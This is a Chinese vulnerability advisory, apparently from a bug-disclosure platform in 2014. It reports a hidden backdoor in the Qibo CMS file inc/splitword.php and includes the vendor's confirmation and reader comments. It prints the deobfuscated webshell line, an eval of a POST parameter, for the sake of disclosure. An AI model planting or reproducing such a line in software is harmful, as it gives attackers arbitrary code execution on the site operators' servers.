漏洞概要
关注数(24)
关注此漏洞
漏洞标题:齐博CMS程序又发现存在一处恶意后门(可执行任意代码)
提交时间:2014-11-28 10:37
修复时间:2015-02-26 10:38
公开时间:2015-02-26 10:38
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
Tags标签:
无
漏洞详情
披露状态:
2014-11-28: 细节已通知厂商并且等待厂商处理中
2014-11-28: 厂商已经确认,细节仅向厂商公开
2014-12-01: 细节向第三方安全合作伙伴开放
2015-01-22: 细节向核心白帽子及相关领域专家公开
2015-02-01: 细节向普通白帽子公开
2015-02-11: 细节向实习白帽子公开
2015-02-26: 细节向公众公开
简要描述:
zone里看到有说齐博存在后门,于是下载了源码,发现另一处后门,只能说太贱了!
详细说明:
路径:inc/splitword.php
代码:
反混淆后有一句菜刀马:@eval($_POST['Y2hlbmdzaGlzLmMjd']);
测试一下:
漏洞证明:
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:15
确认时间:2014-11-28 15:29
厂商回复:
感谢提出来
最新状态:
暂无
漏洞评价:
评论
-
2014-11-28 11:11 |
bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)
-
2014-11-28 11:26 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2014-11-28 11:28 |
′雨。 ( 普通白帽子 | Rank:1231 漏洞数:190 | Only Code Never Lie To Me.)
-
2014-11-28 12:02 |
海琪花 ( 路人 | Rank:0 漏洞数:1 | 卖海产 。。。 不买勿扰)
-
2014-11-28 16:02 |
Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)
-
2014-11-28 16:04 |
Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)
@′雨。 不是zone那个,提交别人发现的洞不就刷流氓了
-
2014-12-01 16:58 |
邓先生 ( 路人 | Rank:4 漏洞数:4 | 其实,打你就像划小船)
-
2014-12-03 16:04 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2015-01-05 14:58 |
loopx9 ( 核心白帽子 | Rank:602 漏洞数:62 | ..)
-
2015-02-26 11:21 |
待续 ( 路人 | Rank:13 漏洞数:9 )
-
传到virustotal上看了下,只有越南的一个杀软识别出来了https://www.virustotal.com/en/file/234a07de5bdbf40b5333167d3584987e1acf61b3265f60bc31ef97f14d867e6f/analysis/1424928487/
-
2015-02-28 11:55 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
@wefgod 链接太长了 后面的没显示出来 http://t.cn/RwlRHoo
-
2015-02-28 13:36 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2015-02-28 14:15 |
Mr .LZH ( 普通白帽子 | Rank:583 漏洞数:75 | 非妹子勿扰···)
@苏州同程旅游网络科技有限公司 厂商为什么也那么调皮
-
@Mr .LZH 哪里调皮了,我就是看到然后好奇这种webshell常规的杀软识别程度嘛